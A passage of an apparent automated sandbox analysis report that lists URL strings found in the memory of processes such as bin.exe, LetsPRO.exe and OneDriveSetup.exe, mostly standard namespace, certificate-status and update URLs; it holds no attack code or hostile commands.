                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Cancel
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/CancelFinal
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/CancelFinalxhttp://docs.oasis-open.org/ws-sx/w
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/CancelT
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Issue
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/IssueT
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Renew
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/RenewFinal
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/RenewFinalvhttp://docs.oasis-open.org/ws-sx/ws
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/RenewT
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCT
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCT-Cancel
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Validate
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/ValidateFinal
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/ValidateFinalw
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/ValidateT
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Validatevhttp://docs.oasis-open.org/ws-sx/ws-t
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTRC/IssueFinal
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTRC/IssueFinalvhttp://docs.oasis-open.org/ws-sx/w
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Renew
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/SymmetricKey
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Validate
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/ws-trust-1.3.xsd
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200802
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wsfed/authorization/200706
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wsfed/authorization/200706/authclaims
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wsfed/authorization/200706/claims/action
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wsfed/federation/200706
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordText
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/xx/oasis-2004xx-wss-soap-message-security-1.1#ThumbprintSHA1
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0Jurn:oasis:names:tc:SAML:1.0
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                Source: bin.exe, 00000017.00000003.1656715796.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                Source: svchost.exe, 00000001.00000003.1203263040.000001B0AE3A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                Source: svchost.exe, 00000001.00000003.1203263040.000001B0AE3A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                Source: svchost.exe, 00000001.00000003.1203263040.000001B0AE3A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                Source: svchost.exe, 00000001.00000003.1203263040.000001B0AE3A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                Source: svchost.exe, 00000001.00000003.1203263040.000001B0AE3A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                Source: svchost.exe, 00000001.00000003.1203263040.000001B0AE3A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                Source: svchost.exe, 00000001.00000003.1203263040.000001B0AE3DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                Source: svchost.exe, 00000001.00000003.1203263040.000001B0AE497000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                Source: bin.exe, 00000017.00000003.1512955071.0000000002735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fontawesome.iohttp://fontawesome.io/license/
                Source: bin.exe, 00000017.00000003.1512955071.0000000002735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fontawesome.iohttp://fontawesome.io/license/Copyright
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/AppMenuDictionary.xaml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/AppMenuDictionary.xamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/ButtonDictionary.xaml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/ButtonDictionary.xamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/RadioButtonDictionary.xaml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/RadioButtonDictionary.xamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/ScrollViewDictionary.xaml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/ScrollViewDictionary.xamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/TabControllerDictionary.xaml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/TabControllerDictionary.xamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/TextBoxDictionary.xaml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/TextBoxDictionary.xamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/WindowDictionary.xaml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/WindowDictionary.xamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/app.xaml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/app.xamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/app.baml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/app.bamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/appmenudictionary.baml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/appmenudictionary.bamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/buttondictionary.baml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/buttondictionary.bamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/radiobuttondictionary.baml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/radiobuttondictionary.bamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/scrollviewdictionary.baml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/scrollviewdictionary.bamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/tabcontrollerdictionary.baml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/tabcontrollerdictionary.bamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/textboxdictionary.baml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/textboxdictionary.bamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/windowdictionary.baml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/windowdictionary.bamld
                Source: bin.exe, 00000017.00000003.1514589581.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1527350811.000000000273B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://icsharpcode.net/sharpdevelop/avalonedit
                Source: bin.exe, 00000017.00000003.1514589581.000000000273B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.Highlighting
                Source: bin.exe, 00000017.00000003.1514589581.000000000273B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.HighlightingQ
                Source: bin.exe, 00000017.00000003.1514589581.000000000273B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://icsharpcode.net/sharpdevelop/syntaxdefinition/2008
                Source: bin.exe, 00000017.00000003.1514589581.000000000273B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://icsharpcode.net/sharpdevelop/syntaxdefinition/20081Error
                Source: LetsPRO.exe, 00000037.00000002.1890859307.0000000005F22000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                Source: bin.exe, 00000017.00000003.1655545010.0000000002737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://logging.apache.org/log4net/release/faq.html#trouble-EventLog
                Source: bin.exe, 00000017.00000003.1872779362.000000000060F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000002.1960630433.000000000040A000.00000004.00000001.01000000.00000010.sdmp, bin.exe, 00000017.00000000.1415007556.000000000040A000.00000008.00000001.01000000.00000010.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: powershell.exe, 00000019.00000002.1803364576.000000000607B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: OneDriveSetup.exe, 00000000.00000003.1283662879.000001F795791000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: OneDriveSetup.exe, 00000000.00000003.1283662879.000001F795791000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1506130454.0000000002732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                Source: OneDriveSetup.exe, 00000000.00000003.1283662879.000001F795791000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1506130454.0000000002732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                Source: bin.exe, 00000017.00000003.1506130454.0000000002732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0P
                Source: OneDriveSetup.exe, 00000000.00000003.1283662879.000001F795791000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                Source: bin.exe, 00000017.00000003.1588475282.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1571632346.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1534928087.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1540649267.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1547368330.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1685265408.0000000002738000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1601138069.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1623511501.000000000273E000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1682638715.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1569113224.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1668604569.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1619337854.0000000002734000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1526004795.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1546714965.000000000273C000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1604889904.0000000002732000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1598303869.000000000273A000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1594592668.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1614739993.0000000002734000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1532987225.0000000002735000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1607032792.000000000526F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1588475282.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1571632346.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1534928087.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1540649267.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1547368330.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1685265408.0000000002738000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1601138069.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1623511501.000000000273E000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1682638715.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1569113224.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1668604569.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1619337854.0000000002734000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1526004795.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1546714965.000000000273C000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1604889904.0000000002732000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1598303869.000000000273A000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1594592668.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1614739993.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                Source: bin.exe, 00000017.00000003.1588475282.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1571632346.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1534928087.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1540649267.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1547368330.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1685265408.0000000002738000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1601138069.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1623511501.000000000273E000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1682638715.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1569113224.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1668604569.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1619337854.0000000002734000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1526004795.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1546714965.000000000273C000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1604889904.0000000002732000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1598303869.000000000273A000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1594592668.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1614739993.0000000002734000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1532987225.0000000002735000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1607032792.000000000526F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45codesignca20200V
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr103
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                Source: bin.exe, 00000017.00000003.1588475282.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1571632346.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1534928087.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1540649267.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1547368330.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1685265408.0000000002738000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1601138069.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1623511501.000000000273E000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1682638715.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1569113224.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1668604569.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1619337854.0000000002734000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1526004795.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1546714965.000000000273C000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1604889904.0000000002732000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1598303869.000000000273A000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 